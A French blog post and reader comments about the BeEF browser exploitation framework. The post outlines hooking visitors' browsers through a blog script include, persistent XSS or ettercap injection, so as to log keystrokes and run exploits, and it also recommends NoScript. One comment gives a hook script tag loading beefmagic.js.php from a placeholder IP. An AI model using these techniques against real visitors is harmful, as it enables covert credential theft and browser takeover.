BeEF ' browser exploitation framework ' est une application permettant d'interagir avec le navigateur internet d'une victime, par le biais de javascript.De nouveaux modules font leur apparition, aujourd'hui on a un module permettant la détection de vmware par le biais d'internet explorer, il y a peu ils ont aussi rajouté le poc pour firefox, permettant un crash du navigateur.
exemple d'utilisation:
BeEF est une application écrite en php (donc il faut apache et php sur votre machine) ou avoir un hébergement quelque part ( free.fr justfree etc)
à partir de la vous installez l'application (ne nécessite pas mysql)
Vous avez votre console de gestion, pour les zombies (les personnes qui se bouffent le javascript)
Et l'autre page importante, celle qui contient le javascript
Prenons un exemple simple, j'installe BeEF sur un hébergeur gratuit, sur le blog dans ma colonne de droite je rajoute un href du javascript de l'autre hébergeur.
Résultat si je suis devant ma console BeEF et que vous visitez n'importe quelle page de mon blog vous allez faire partit de mes zombies.
A partir de la je suis apte à enregistrer vos touches de frappes (par exemple si vous avez la page bricowifi, et que vous rentrez pass et login dans un nouvel onglet pour votre compte mail, c'est enregistré)
envoyer en direct des commandes javascript ou utiliser un exploit permettant la prise de contrôle de votre pc, si votre navigateur est vulnérable et d'autres trucs
(vous avez aucun risques sur le blog bricowifi, le blog n'est pas fait pour réaliser des test à l'encontre des visiteurs)
Autre exemple, une XSS sur un site web, si elle est persistante on peut faire le même scénario que décrit précédemment, ce qui va faire que toutes les personnes visitant la page vulnérable vont se prendre le javascript et donc faire partit de la liste des zombies.
Si elle n'est pas persistante c'est de suite moins intéressant, mais avec un peu de social vous pouvez forcer la personne à aller dessus.
Autre exemple, j'arrive sur un réseau mal protégé, je fait un filtre ettercap pour vous faire prendre le js et hop, vous apparaissez dans ma liste de zombies.
Comment se protéger ?
Une bonne solution, consiste si vous utilisez firefox de rajouter l'extention noscript qui permet de désactiver javascript et d'autoriser seulement ce qu'on désire (exemple video youtube etc)
Voila en espérant avoir été relativement clair :)
BeEF brower exploitation framework:download: BeEF
download: modules complémentaires
Dans le même style vous avez browser rider
Un problème? Venez en parler sur le forum, tout a une solution :D
13 commentaires:
c'est quand même dingue, et ya aucune protection contre ça?
les firfox et compagnie sont il au courant de ce procédé?
si y a le pluggin noscript pour firefox qui est bien, cela dit sinon, tu peux désactiver java javascript dans firefox, mais après plus de youtube et compagnie...
J'ai voulu essayé donc je l'ai up et ensuite je me rends sur la page, je tape le mot de passe et j'ai ceci:
Permissions on the /jotun1/monftp.com/b/l/i/moi/htdocs/beef/include directory are incorrect. Running the following command will corrent the problem:
# chown /jotun1/justfree.com/b/l/i/moi/htdocs/beef/include
# chown -R /jotun1/monftp.com/b/l/i/bling/htdocs/beef/cache
Donc j'ai essayé de taper les 2 commandes mai je reçois juste "500?" comme réponse...
tes permissions ne sont pas bonnes, il faut qu'il puisse lire et ecrire
Bon bah en fait un petit chmod et tout va bien...
Bref j'arrive sur la page ou il me dit : Use a browser to connect to 'http://beefsite/hook/xss-example.htm'. Now a zombie will appear in the zombie section of the BeEF UI. The IP address in the file will require editing.
Donc j'ouvre le xss-example.htm et je modifie http://localhost/beef/hook/beefmagic.js.php
en
http://moi.monftp.com/beef/hook/beefmagic.js.php
Mais ça ne fonctionne pas...
A noter que le module autorun fonctionne mais je ne me vois pas dans la liste des zombies...
il faut qu'il y ai toute l'installation de beef sur le serveur.
ensuite sur un autre site tu appelles le js:
script language='Javascript'
src='http://88.88.88.88/beef/hook/beefmagic.js.php' script
88.88.88.88 à remplacer par ton ip ou ton nom de domaine
Toute l'installation y'est. Ca doit obligatoirement être sur un autre site?
Je vais essayer ça tout de suite
Bon bah toujours pas... Maintenant le autorun ne fonctionne plus
J'ai bien mon xss-example.htm sur un ftp et toute l'instal de beef sur un autre et le xss appele bien
http://moi.1erftp.com/beef/hook/beefmagic.js.php
(si ça peut aider je peux filer les url mais je ne sais pas si c'est correct dont je m'abstiens pour le moment)
Finallement le autorun marche... Mais toujours pas de zombie.
J'ai refait la manip mais c'est toujours pareil: l'autorun fonctionne mais aucun zombie n'apparait dans la liste... Aucune idée de ce qui peut clocher?
Enregistrer un commentaire